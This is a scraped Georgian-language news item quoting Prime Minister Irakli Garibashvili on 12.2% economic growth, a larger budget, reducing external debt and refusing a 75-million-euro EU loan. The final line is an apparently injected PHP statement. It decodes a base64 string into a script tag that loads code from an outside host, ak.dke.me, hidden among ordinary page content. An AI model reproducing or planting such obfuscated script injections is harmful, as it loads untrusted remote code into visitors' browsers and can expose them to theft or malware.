celsiusi
ავერსი საქკაბელი
ჩვენ დავიწყეთ ეკონომიკის სწრაფი აღდგენა, რეგიონში უპრეცედენტო ზრდა გვაქვს. დაზუსტდა ეკონომიკური მაჩვენებელი - 12.2%-იანი ზრდა გვაქვს შვიდ თვეში, - ამის შესახებ ირაკლი ღარიბაშვილმა „რუსთავი 2“-ის ეთერში განაცხადა.
 
მისივე თქმით, მისმა მთავრობამ ბიუჯეტი მილიარდ 200 მილიონი ლარით გაზარდა.
 
„რა ბიუჯეტი დამხვდა იცით თქვენ, არაფერი… ჯანდაცვას აკლდებოდა 600 მლნ, საიდან უნდა მოგვეტანა ეს ფული, არავის არ ჰქონდა პასუხი. ჩვენი ამოცანა იყო და არის საგარეო ვალის შემცირება. წინა წელს მთავრობამ აიღო 3 მლრდ დოლარი. ეს ვისი გადასახდელია? ჩვენი, ჩვენი შვილების. საგარეო ვალთან მიმართებაში ნიშნული 60%-ზე ავიდა. ჩვენს სტრატეგიაში, მათ შორის 10-წლიან სტრატეგიაში გვიწერია, რომ აუცილებელია საგარეო ვალის შემცირება და ამ მიმართულებით დავიწყეთ ნაბიჯების გადადგმა. ამიტომ 75 მლნ ევრო არ წარმოადგენდა რეალურ სასიცოცხლოდ მნიშვნელოვან დახმარებას. თან ეს არ იყო დახმარება, სამი დღე ვამტკიცებდით რომ ეს იყო სესხი“, - განაცხადა ღარიბაშვილმა ევროკავშირის 75-მილიონიან დახმარებაზე საქართველოს მთავრობის უარის თქმის განმარტებისას.
1183
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");